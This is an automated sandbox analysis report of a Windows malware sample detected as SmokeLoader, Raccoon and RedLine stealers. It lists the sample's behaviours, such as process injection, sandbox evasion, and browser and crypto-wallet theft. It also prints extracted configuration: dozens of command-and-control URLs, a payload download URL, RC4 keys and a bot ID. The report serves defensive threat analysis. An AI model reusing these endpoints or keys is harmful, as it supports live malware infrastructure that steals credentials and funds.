Play interactive tour

Edit tour

Windows Analysis Report IuXJUPoEo6.exe

Overview

General Information

Sample Name:	IuXJUPoEo6.exe
Analysis ID:	464621
MD5:	06a029882deabf229f62728afe3baf4f
SHA1:	33a5953fbcce8761af1e68df9c9f4ad153c4a536
SHA256:	f24a559e79ba3121c7e0fed4ac995da056fe6a0dac71b2360f9e340b97117d05
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Raccoon Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Drops PE files to the startup folder

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

IuXJUPoEo6.exe (PID: 5836 cmdline: 'C:\Users\user\Desktop\IuXJUPoEo6.exe' MD5: 06A029882DEABF229F62728AFE3BAF4F)

IuXJUPoEo6.exe (PID: 1720 cmdline: 'C:\Users\user\Desktop\IuXJUPoEo6.exe' MD5: 06A029882DEABF229F62728AFE3BAF4F)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

9163.exe (PID: 2764 cmdline: C:\Users\user\AppData\Local\Temp\9163.exe MD5: A69E12607D01237460808FA1709E5E86)

9675.exe (PID: 3412 cmdline: C:\Users\user\AppData\Local\Temp\9675.exe MD5: AB2F76D60587996BA3CD8782785CAAA5)

WerFault.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 744 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

9C52.exe (PID: 1948 cmdline: C:\Users\user\AppData\Local\Temp\9C52.exe MD5: B19AC380411ED5D8B5A7E7E0C1DA61A6)

cmd.exe (PID: 5776 cmdline: cmd /Q /C C:\Users\user\AppData\Local\Temp/s.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

A329.exe (PID: 4468 cmdline: C:\Users\user\AppData\Local\Temp\A329.exe MD5: 5707DDADA5B7EA6BEF434CD294FA12E1)

A329.exe (PID: 5404 cmdline: C:\Users\user\AppData\Local\Temp\A329.exe MD5: 5707DDADA5B7EA6BEF434CD294FA12E1)

WerFault.exe (PID: 6132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 8 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

AD1D.exe (PID: 5156 cmdline: C:\Users\user\AppData\Local\Temp\AD1D.exe MD5: 717D65DBA56F47E540DCA074C3977B3D)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchostsw.exe (PID: 1648 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe' MD5: B19AC380411ED5D8B5A7E7E0C1DA61A6)

ehdjcua (PID: 4472 cmdline: C:\Users\user\AppData\Roaming\ehdjcua MD5: 06A029882DEABF229F62728AFE3BAF4F)

ehdjcua (PID: 3732 cmdline: C:\Users\user\AppData\Roaming\ehdjcua MD5: 06A029882DEABF229F62728AFE3BAF4F)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://readinglistforjuly9.club/", "http://readinglistforjuly3.club/", "http://readinglistforjuly10.club/", "http://readinglistforjuly4.club/", "http://readinglistforjuly8.site/", "http://readinglistforjuly3.site/", "http://readinglistforjuly7.xyz/", "http://readinglistforjuly10.site/", "http://readinglistforjuly4.site/", "http://readinglistforjuly9.site/", "http://readinglistforjuly8.xyz/", "http://readinglistforjuly6.xyz/", "http://readinglistforjuly1.xyz/", "http://readinglistforjuly6.club/", "http://readinglistforjuly5.club/", "http://readinglistforjuly2.xyz/", "http://readinglistforjuly3.xyz/", "http://readinglistforjuly5.site/", "http://readinglistforjuly4.xyz/", "http://readinglistforjuly10.xyz/", "http://readinglistforjuly5.xyz/", "http://readinglistforjuly6.site/", "http://readinglistforjuly7.club/", "http://readinglistforjuly1.club/", "http://readinglistforjuly2.club/", "http://readinglistforjuly8.club/", "http://readinglistforjuly9.xyz/", "http://readinglistforjuly2.site/", "http://readinglistforjuly7.site/", "http://readinglistforjuly1.site/"]}

Threatname: Raccoon Stealer

{"RC4_key2": "7b5b51ce4b45869aa45f99746c6f63ae", "C2 url": "https://telete.in/p1rosto100xx", "Bot ID": "471c70de3b4f9e4d493e418d1f60a90659057de0", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bad_module_info_db128abe1f5044de3cf7da11a66860834ebfe56e_85207d7d_1671ad43\Report.wer	SUSP_WER_Suspicious_Crash_Directory	Detects a crashed application executed in a suspicious directory	Florian Roth	0x11c:$a1: ReportIdentifier= 0x19e:$a1: ReportIdentifier= 0x718:$a2: .Name=Fault Module Name 0x1aa8:$a3: AppPath=

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.303424568.0000000000420000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001A.00000003.334812950.00000000012F0000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.247979321.0000000001F51000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.247967677.0000000001F30000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000013.00000002.303450703.0000000000491000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Process Memory Space: A329.exe PID: 4468	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: AD1D.exe PID: 5156	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: A329.exe PID: 5404	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://readinglistforjuly10.xyz/	Avira URL Cloud: Label: malware
Source: http://readinglistforjuly2.xyz/raccon.exe	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000013.00000002.303424568.0000000000420000.00000004.00000001.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://readinglistforjuly9.club/", "http://readinglistforjuly3.club/", "http://readinglistforjuly10.club/", "http://readinglistforjuly4.club/", "http://readinglistforjuly8.site/", "http://readinglistforjuly3.site/", "http://readinglistforjuly7.xyz/", "http://readinglistforjuly10.site/", "http://readinglistforjuly4.site/", "http://readinglistforjuly9.site/", "http://readinglistforjuly8.xyz/", "http://readinglistforjuly6.xyz/", "http://readinglistforjuly1.xyz/", "http://readinglistforjuly6.club/", "http://readinglistforjuly5.club/", "http://readinglistforjuly2.xyz/", "http://readinglistforjuly3.xyz/", "http://readinglistforjuly5.site/", "http://readinglistforjuly4.xyz/", "http://readinglistforjuly10.xyz/", "http://readinglistforjuly5.xyz/", "http://readinglistforjuly6.site/", "http://readinglistforjuly7.club/", "http://readinglistforjuly1.club/", "http://readinglistforjuly2.club/", "http://readinglistforjuly8.club/", "http://readinglistforjuly9.xyz/", "http://readinglistforjuly2.site/", "http://readinglistforjuly7.site/", "http://readinglistforjuly1.site/"]}
Source: 30.0.A329.exe.400000.1.unpack	Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "7b5b51ce4b45869aa45f99746c6f63ae", "C2 url": "https://telete.in/p1rosto100xx", "Bot ID": "471c70de3b4f9e4d493e418d1f60a90659057de0", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for domain / URL

Show sources

Source: readinglistforjuly1.xyz	Virustotal: Detection: 6%	Perma Link
Source: readinglistforjuly2.xyz	Virustotal: Detection: 6%	Perma Link
Source: telete.in	Virustotal: Detection: 12%	Perma Link
Source: http://readinglistforjuly4.club/	Virustotal: Detection: 6%	Perma Link
Source: http://readinglistforjuly2.site/	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\Runtimebroker.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\9163.exe	Metadefender: Detection: 48%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\9163.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\9675.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\A329.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\ehdjcua	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Show sources

Source: IuXJUPoEo6.exe	Virustotal: Detection: 29%			Perma Link
Source: IuXJUPoEo6.exe	ReversingLabs: Detection: 50%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: Process Memory Space: A329.exe PID: 4468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A329.exe PID: 5404, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\ProgramData\Runtimebroker.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9C52.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A329.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AD1D.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: IuXJUPoEo6.exe

Joe Sandbox ML: detected

Source: 27.2.WerFault.exe.5020000.8.unpack

Avira: Label: TR/Patched.Gen

Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_004046E0 CreateFileW,CryptAcquireContextW,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,		21_2_004046E0
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EF4930 CreateFileW,CryptAcquireContextW,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,		21_2_02EF4930

Source: IuXJUPoEo6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\AppData\Local\Temp\9675.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.340286255.0000000005114000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.334109443.0000000002EBF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.340286255.0000000005114000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb[, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdbI, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbs, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: L>NC:\nasuxitoti\wanuketas\yal\yabovu fapetuxo\lekagokese\heguna.pdb source: IuXJUPoEo6.exe
Source:	Binary string: cfgmgr32.pdb#, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbU, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.334109443.0000000002EBF000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbg, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: C:\nasuxitoti\wanuketas\yal\yabovu fapetuxo\lekagokese\heguna.pdb source: IuXJUPoEo6.exe
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdbH source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: WC:\kagazejalu\wovuge-botedoyetazusu27-ziposuberedegi-83.pdb source: 9C52.exe, 00000018.00000000.319780202.0000000000429000.00000002.00020000.sdmp, svchostsw.exe, 00000026.00000000.362370409.0000000000429000.00000002.00020000.sdmp, svchostsw.exe.31.dr
Source:	Binary string: shell32.pdbO, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdb_ source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: C:\yilaviheyos-gacubozarijuy\cas65 disehe\xamadaficaho\zacenamij.pdb source: 9675.exe, 00000015.00000000.315333198.000000000042E000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.354456294.0000000005020000.00000002.00000001.sdmp, Runtimebroker.exe.21.dr
Source:	Binary string: C:\kagazejalu\wovuge-botedoyetazusu27-ziposuberedegi-83.pdb source: 9C52.exe, 00000018.00000000.319780202.0000000000429000.00000002.00020000.sdmp, svchostsw.exe, 00000026.00000000.362370409.0000000000429000.00000002.00020000.sdmp, svchostsw.exe.31.dr
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DIFXAPI.pdb source: AD1D.exe, 0000001A.00000000.329415996.0000000001382000.00000002.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.340208137.0000000005111000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\79213\Documents\Visual Studio 2019\Projects\Projectrbroker\Release\RuntimeBroker.pdb source: 9675.exe
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.340270250.0000000005110000.00000004.00000040.sdmp
Source:	Binary string: CLBCatQ.pdbm, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: DC:\yilaviheyos-gacubozarijuy\cas65 disehe\xamadaficaho\zacenamij.pdb source: 9675.exe, 00000015.00000000.315333198.000000000042E000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.354456294.0000000005020000.00000002.00000001.sdmp, Runtimebroker.exe.21.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AD1D.exe, 0000001A.00000000.329638261.0000000001492000.00000080.00020000.sdmp, AD1D.exe.6.dr
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.340154075.0000000005141000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdbC, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdby, source: WerFault.exe, 0000001B.00000003.340228598.0000000005117000.00000004.00000040.sdmp

Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0040C9F7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	21_2_0040C9F7
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_0041DB78 FindFirstFileExW,	21_2_0041DB78
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02EFCC47 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	21_2_02EFCC47
Source: C:\Users\user\AppData\Local\Temp\9675.exe	Code function: 21_2_02F0DDC8 FindFirstFileExW,	21_2_02F0DDC8

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://readinglistforjuly9.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly3.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly10.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly4.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly8.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly3.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly7.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly10.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly4.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly9.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly8.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly6.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly1.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly6.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly5.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly2.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly3.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly5.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly4.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly10.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly5.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly6.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly7.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly1.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly2.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly8.club/
Source: Malware configuration extractor	URLs: http://readinglistforjuly9.xyz/
Source: Malware configuration extractor	URLs: http://readinglistforjuly2.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly7.site/
Source: Malware configuration extractor	URLs: http://readinglistforjuly1.site/
Source: Malware configuration extractor	URLs: https://telete.in/p1rosto100xx

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 193.56.146.22 ports 47861,1,4,6,7,8

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: readinglistforjuly1.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforjuly2.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforjuly1.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforjuly2.xyz
Source:	DNS query: readinglistforjuly2.xyz

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8888
